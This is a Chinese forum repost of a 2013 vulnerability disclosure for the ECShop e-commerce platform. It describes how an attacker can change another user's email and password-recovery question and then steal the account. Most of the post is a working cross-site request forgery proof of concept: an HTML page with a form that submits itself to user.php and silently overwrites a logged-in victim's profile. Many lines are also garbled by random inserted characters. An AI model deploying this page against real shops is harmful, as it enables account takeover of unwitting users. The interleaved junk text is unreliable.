找回密码
 立即注册
查看: 2933|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
- T- ?4 R0 W2 V, jecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
6 K" \6 L0 h: g# b' d7 n
6 o# R6 l. Y- o) y# K3 A+ V" qDemo For:http://www.wooyun.org/bug.php?action=view&id=395
: _+ g$ ?, B* W6 a! F; X8 }7 O3 Z  @) w" K
详细说明:
" s/ K9 V9 X: l% q利用csrf和xss可以突破官方所说的“障碍”
/ o& o7 ?4 A1 L, t3 M% Z2 h9 w) G/ Lxss版本已经有人说明/ a4 Y! P& p5 w5 @
这里给出csrf版本
% Z- l# c/ g4 p" x, ~$ D1 F/ [: U0 z+ S/ Z9 g) K/ }: ]' @
漏洞证明:
! R* U: b% k$ F# q# X<html>7 G5 j: |' @" Y7 D  u3 Q
<body>5 i* S8 Q; S2 y9 j* k5 q- j
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
/ Q. D* N. v8 H" z4 [, f, s<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
' U; m4 T1 j  V& W( D* s<INPUT TYPE="text" NAME="act" value="act_edit_profile">
$ z0 a0 c! p' V+ R- T<INPUT TYPE="text" NAME="sel_question" value="ecshop">* w( @9 n7 p! H6 c+ `
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
) v% G# j- i# _, ~- h7 U</body>
- w2 T3 ?. h- M) j4 [<script>
, F) ]+ H' A& _document.forms[0].submit();+ S( i! F; n8 h5 ?4 j, W
</script>
! ~# e3 K3 b6 h, Z7 L) y</html>- m5 x. T- \3 D8 b5 x3 d. Y
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失/ B: O7 y! \; W
; M0 M3 s( H& v; l% o. r0 h& \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表